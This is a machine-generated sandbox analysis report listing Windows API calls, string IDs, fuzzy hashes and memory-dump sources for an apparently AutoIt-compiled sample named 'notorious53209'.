                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                            • API String ID: 834269672-1287834457
                                            • Opcode ID: 049d75b5b56406273d26278f8bf5f19dab7ad1c00da7f853014009775e40af03
                                            • Instruction ID: 491db7a12c136d6ac07d6915f53a036dc92981382f2984054c3c582856722cac
                                            • Opcode Fuzzy Hash: 049d75b5b56406273d26278f8bf5f19dab7ad1c00da7f853014009775e40af03
                                            • Instruction Fuzzy Hash: 2561DF746283019FD710DF24C988F6ABBE8AF4A714F10091DF9859B291DF74ED68CB92
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0029B73B
                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0029B7B1
                                            • GetLastError.KERNEL32 ref: 0029B7BB
                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0029B828
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Error$Mode$DiskFreeLastSpace
                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                            • API String ID: 4194297153-14809454
                                            • Opcode ID: cb589db9f7ba8640401c0f992a90e07ca7c9812f6b01ef470cd2cbabf1670d5d
                                            • Instruction ID: 006c3a791556e1ec6409afdd651c58d257b2281735b22fbf994c4f57cd1a42aa
                                            • Opcode Fuzzy Hash: cb589db9f7ba8640401c0f992a90e07ca7c9812f6b01ef470cd2cbabf1670d5d
                                            • Instruction Fuzzy Hash: D531E435A202099FDF01EFA8ED89AFEB7B4FF45300F104229E406DB291DB719962CB51
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 0028B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0028B0E7
                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002894F6
                                            • GetDlgCtrlID.USER32 ref: 00289501
                                            • GetParent.USER32 ref: 0028951D
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00289520
                                            • GetDlgCtrlID.USER32(?), ref: 00289529
                                            • GetParent.USER32(?), ref: 00289545
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00289548
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 7a4947725d6e19c9a7dd7b4f305f75f005e9b17c508c03331624461b074e1bb1
                                            • Instruction ID: ddbb15b8d8fa22bb40225d7708ed97507d3227e707a2fb0e6cec77103f2aadb4
                                            • Opcode Fuzzy Hash: 7a4947725d6e19c9a7dd7b4f305f75f005e9b17c508c03331624461b074e1bb1
                                            • Instruction Fuzzy Hash: 5B21E274A10104ABCF01AF65CC85DFEBB68FF45300F50022AB921972E2DB7559699F20
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 0028B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0028B0E7
                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002895DF
                                            • GetDlgCtrlID.USER32 ref: 002895EA
                                            • GetParent.USER32 ref: 00289606
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00289609
                                            • GetDlgCtrlID.USER32(?), ref: 00289612
                                            • GetParent.USER32(?), ref: 0028962E
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00289631
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 735887fbf7eca0fafd2ff41d8e2da6f885e998eeb6fe723e052ca9263c6c1e78
                                            • Instruction ID: 0257fb624a2bd4d7349b33fbc2566302d589a599d36882942aa23d37dcf4e613
                                            • Opcode Fuzzy Hash: 735887fbf7eca0fafd2ff41d8e2da6f885e998eeb6fe723e052ca9263c6c1e78
                                            • Instruction Fuzzy Hash: 8921B3B4A11204BBDF01AB65CC85EFEBBB8EF49300F540126F921972E1DB7599699F20
                                            APIs
                                            • GetParent.USER32 ref: 00289651
                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00289666
                                            • _wcscmp.LIBCMT ref: 00289678
                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002896F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameParentSend_wcscmp
                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                            • API String ID: 1704125052-3381328864
                                            • Opcode ID: cf8051c9b75e6fc7d484a1c870adb3c7c772b3396ab3ad31ddc19d4e93bf6d7f
                                            • Instruction ID: 1286f9e83a4a9d8588699236724d7d6f486884a2f9af2b0c308cb28c82c738e8
                                            • Opcode Fuzzy Hash: cf8051c9b75e6fc7d484a1c870adb3c7c772b3396ab3ad31ddc19d4e93bf6d7f
                                            • Instruction Fuzzy Hash: 33113D7A2B5313BAFA013631DC0ADB6779C8B053A0F200127FD00A04D1FEA169F04F48
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 002A8BEC
                                            • CoInitialize.OLE32(00000000), ref: 002A8C19
                                            • CoUninitialize.OLE32 ref: 002A8C23
                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 002A8D23
                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 002A8E50
                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002C2C0C), ref: 002A8E84
                                            • CoGetObject.OLE32(?,00000000,002C2C0C,?), ref: 002A8EA7
                                            • SetErrorMode.KERNEL32(00000000), ref: 002A8EBA
                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002A8F3A
                                            • VariantClear.OLEAUT32(?), ref: 002A8F4A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                            • String ID:
                                            • API String ID: 2395222682-0
                                            • Opcode ID: 79ba57552fd8e9b73a663c9a46d474a9ba6abe37c1109f7d5d316938af597c87
                                            • Instruction ID: f0fff8f79a468027bb6b948762eb094cf46fb56371d0aca7244e0e8324bd6a5a
                                            • Opcode Fuzzy Hash: 79ba57552fd8e9b73a663c9a46d474a9ba6abe37c1109f7d5d316938af597c87
                                            • Instruction Fuzzy Hash: C9C134B1618305AFD700DF28C88492AB7E9FF8A748F00496DF58A9B250DB71ED55CB52
                                            APIs
                                            • __swprintf.LIBCMT ref: 0029419D
                                            • __swprintf.LIBCMT ref: 002941AA
                                              • Part of subcall function 002538D8: __woutput_l.LIBCMT ref: 00253931
                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 002941D4
                                            • LoadResource.KERNEL32(?,00000000), ref: 002941E0
                                            • LockResource.KERNEL32(00000000), ref: 002941ED
                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0029420D
                                            • LoadResource.KERNEL32(?,00000000), ref: 0029421F
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0029422E
                                            • LockResource.KERNEL32(?), ref: 0029423A
                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0029429B
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                            • String ID:
                                            • API String ID: 1433390588-0
                                            • Opcode ID: 4e45d108b3a2364bedb41add82b599777d7a933b1100f4eff339ec31ff19a7d3
                                            • Instruction ID: d4f2c8160ac63f18672b254eb2fc9e8c3a155b26612734d87d8167781873aaae
                                            • Opcode Fuzzy Hash: 4e45d108b3a2364bedb41add82b599777d7a933b1100f4eff339ec31ff19a7d3
                                            • Instruction Fuzzy Hash: 64317C71A1521AAFDF11AF60ED48EBA7BACFF04341F008625FD05D6150D770DA62CBA0
                                            APIs
                                            • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00290778,?,00000001), ref: 00291700
                                            • GetForegroundWindow.USER32 ref: 00291714
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0029171B
                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0029172A
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0029173C
                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00291755
                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00291767
                                            • AttachThreadInput.USER32(00000000,00000000), ref: 002917AC
                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 002917C1
                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 002917CC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                            • String ID:
                                            • API String ID: 2156557900-0
                                            • Opcode ID: 4acea8231eac2bff798c1591db80eb7b18977479f9cb7dc906501936f62a05ff
                                            • Instruction ID: 26f62cb45d01eb2219d8d216e0a9f0cf2c697eab527a205c7560e03bafad2c5f
                                            • Opcode Fuzzy Hash: 4acea8231eac2bff798c1591db80eb7b18977479f9cb7dc906501936f62a05ff
                                            • Instruction Fuzzy Hash: 8731A075620207BBEF119F95EE8CBB9B7ADAB25B61F104124F804863A0D7709D60CB60
                                            APIs
                                            • EnumChildWindows.USER32(?,0028AA64), ref: 0028A9A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ChildEnumWindows
                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                            • API String ID: 3555792229-1603158881
                                            • Opcode ID: 0ad82ec2201958b57ad39cc56bf558dacc5496769a448ea3f8ef11a3f85828fb
                                            • Instruction ID: 58c6b2f1c050e03ae5328c60ab13ed8f9dbfde53d3fb26551c79b216b8716234
                                            • Opcode Fuzzy Hash: 0ad82ec2201958b57ad39cc56bf558dacc5496769a448ea3f8ef11a3f85828fb
                                            • Instruction Fuzzy Hash: 7D9194749256079BEB18EF60C481BE9FB74BF04304F50811BD899A7181DF30AAB9DFA1
                                            APIs
                                            • SetWindowLongW.USER32(?,000000EB), ref: 00232EAE
                                              • Part of subcall function 00231DB3: GetClientRect.USER32(?,?), ref: 00231DDC
                                              • Part of subcall function 00231DB3: GetWindowRect.USER32(?,?), ref: 00231E1D
                                              • Part of subcall function 00231DB3: ScreenToClient.USER32(?,?), ref: 00231E45
                                            • GetDC.USER32 ref: 0026CF82
                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0026CF95
                                            • SelectObject.GDI32(00000000,00000000), ref: 0026CFA3
                                            • SelectObject.GDI32(00000000,00000000), ref: 0026CFB8
                                            • ReleaseDC.USER32(?,00000000), ref: 0026CFC0
                                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 0026D04B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                            • String ID: U
                                            • API String ID: 4009187628-3372436214
                                            • Opcode ID: 6efa7f2d8213922a066d519e753308a395b09988c1a08e88c37f2b3370847deb
                                            • Instruction ID: c2e470c1cb60776401e5f1fb228f024173cdb49c986ae93c1b9391fcb3681cd8
                                            • Opcode Fuzzy Hash: 6efa7f2d8213922a066d519e753308a395b09988c1a08e88c37f2b3370847deb
                                            • Instruction Fuzzy Hash: 7B71187092020ADFCF21DF64CC85ABA7BB5FF48360F24426AED955A166C7319CA1DF60
                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00233074
                                            • RegisterClassExW.USER32(00000030), ref: 0023309E
                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002330AF
                                            • LoadIconW.USER32(000000A9), ref: 002330F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 975902462-1005189915
                                            • Opcode ID: 8b3d7ff221d524a83cfa22d0eaa073ab6edb5beb5c90ccc35c0abcb7637c8d5a
                                            • Instruction ID: 6aa97b09facefb0cdd62e8f519519d314cae4b4145a32587bad37a37b97db62e
                                            • Opcode Fuzzy Hash: 8b3d7ff221d524a83cfa22d0eaa073ab6edb5beb5c90ccc35c0abcb7637c8d5a
                                            • Instruction Fuzzy Hash: 213156B1844309AFEB40DFA4ED8CAD9BBF0FB09360F10466EE590A62A0D7B50595CF50
                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00233074
                                            • RegisterClassExW.USER32(00000030), ref: 0023309E
                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 002330AF
                                            • LoadIconW.USER32(000000A9), ref: 002330F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 975902462-1005189915
                                            • Opcode ID: 3d1bd086a35824f906ed371998ebdd0d65fb185f203927187295f2f0034dba86
                                            • Instruction ID: b7f2d212356ccd523b86d3ed45e3cea5f9c17abfcaf483451e4344335cbc26af
                                            • Opcode Fuzzy Hash: 3d1bd086a35824f906ed371998ebdd0d65fb185f203927187295f2f0034dba86
                                            • Instruction Fuzzy Hash: 7621B2B1950218AFDB40DFA4FD8DBADBBF4FB087A0F10462AF910A62A0D7B14554CF91
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002BF910), ref: 002A903D
                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002BF910), ref: 002A9071
                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002A91EB
                                            • SysFreeString.OLEAUT32(?), ref: 002A9215
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                            • String ID:
                                            • API String ID: 560350794-0
                                            • Opcode ID: 91212773ad801f8c26861805048fd25d40977d50f07af9e83d9a3c624754cc8d
                                            • Instruction ID: 9a947092dbbafc9c7b22211a451020fc2b41cf759ac00535a93fd4f746f295d9
                                            • Opcode Fuzzy Hash: 91212773ad801f8c26861805048fd25d40977d50f07af9e83d9a3c624754cc8d
                                            • Instruction Fuzzy Hash: 4DF13A71A1020AEFCF04DF95C888EAEB7B9BF4A314F108499F515AB250DB71AE95CF50
                                            APIs
                                            • _memset.LIBCMT ref: 002AF9C9
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002AFB5C
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002AFB80
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002AFBC0
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002AFBE2
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002AFD5E
                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002AFD90
                                            • CloseHandle.KERNEL32(?), ref: 002AFDBF
                                            • CloseHandle.KERNEL32(?), ref: 002AFE36
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                            • String ID:
                                            • API String ID: 4090791747-0
